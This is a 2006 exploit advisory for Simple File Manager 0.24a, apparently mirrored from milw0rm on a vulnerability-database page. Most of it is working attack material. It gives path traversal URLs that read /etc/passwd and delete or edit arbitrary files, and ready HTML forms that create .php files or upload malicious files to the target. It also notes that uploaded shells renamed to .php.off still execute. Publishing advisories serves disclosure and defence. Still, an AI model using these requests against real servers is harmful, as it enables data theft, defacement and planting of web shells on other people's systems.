Vulners
Lucene search
simple file manager 0.24a - Multiple Vulnerabilities
/*******************************************\
| flame vrs Simple File Manager <=0.24=> |
| http://onedotoh.sourceforge.net/ |
| Various Vulnerbilities Including: |
\*******************************************/
/+++++++++++++++++++++++++++++++++++++++++++\
| Using the scripts supplied by the webapp: |
| Reading of Arbitrary files |
| Deletion of Arbitrary files |
| Modification of Arbitrary files |
| Creation of Arbitrary files |
| Uploading of Malicious files |
\+++++++++++++++++++++++++++++++++++++++++++/
/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
| Simple File Manager (SFM) is a web based |
| file management utility. |
| It is designed to be used by those that |
| don't want to use ftp or SHOULD NOT use |
| ftp. It can be dropped into a specific |
| directory and give access to that |
| directory as well as any directory below |
| it, including those created by SFM. It |
| can be placed in a specific directory and |
| configured to give access to other |
| directories outside of its location |
| (centralized). SFM gives its user upload, |
| rename, delete, directory creation as |
| well as directory navigation (within its |
| tree limits), as well as Create New File; |
| it also includes an image viewer, text |
| viewer and mime type downloading. |
\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |
| Thats the description from the author...|
| Which basically outlines all of its |
| vulnerbilities. |
\_________________________________________/
/=========================================================================================================================\
############################ .:Reading of Arbitrary Files:. ###############################################################
# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2 #
# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################ .:Deletion of Arbirary Files:. ###############################################################
# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext= #
# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext= #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################# .:Modification of Arbitrary Files:. #########################################################
# fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext= #
# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext= #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################# .:Creation of Arbitrary Files:. #############################################################
# START LOCAL HTML FILE: #
<form name="form1" method="post" action="http://www.site.com/file/fm.php">
<center>Filename: <input type="text" name="newfilename">
<select class=altButton name="newfileext">
<option>.txt</option><option>.html</option><option>.php</option>
</select>
<textarea name="newcontent" cols="60" rows="15"></textarea>
<input type="hidden" name="copt" value="1">
<input type="submit" name="savenew" value="Save">
<input type="hidden" name="u" value="">
<input type="hidden" name="pathext" value="/">
<input type="hidden" name=sortKey value="2">
</center>
</form>
# END LOCAL HTML FILE #
###########################################################################################################################
# Note... various characters are escaped. And by default all .php files will be renamed to file.php.off #
# Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files) #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################## .: Uploading of Malicious Files:. ##########################################################
# START LOCAL HTML FILE: #
<form name="form1" method="post" action="http://www.site.com/file/fm.php" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="104857600">
<input type="hidden" name="copt" value="1">
<input type="file" name="uploadedfile">
<input type="submit" name="upload" value="Upload">
<input type="hidden" name="u" value="">
<input type="hidden" name="pathext" value="/">
<input type="hidden" name=sortKey value="2">
</form>
# END LOCAL HTML FILE #
###########################################################################################################################
# Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it#
# will execute... EG: http://www.site.com/file/phpshell.php.off #
###########################################################################################################################
\=========================================================================================================================/
/++++++++++++++++++++++++++++\
| Be good, and dont be too |
| hopeful about finding |
| yourself a gibbon running |
| this script. It predates |
| my #999999 hair. |
\++++++++++++++++++++++++++++/
/{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\
|---------------------------------------|
| <&bk> stfu flame |
| <~PhaZe_One> no fame without flame |
| <+c|p> I love you flame |
| <%emc2> flame wishes death upon you |
| <Thaimaishu> are you emo flame? |
| <&[myg0t]40> flame dont be mad |
| *~str0ke humps flame's leg |
| <&ZoNe_VoRTeX> <3 flame |
|---------------------------------------|
\{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/
# milw0rm.com [2006-12-02]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4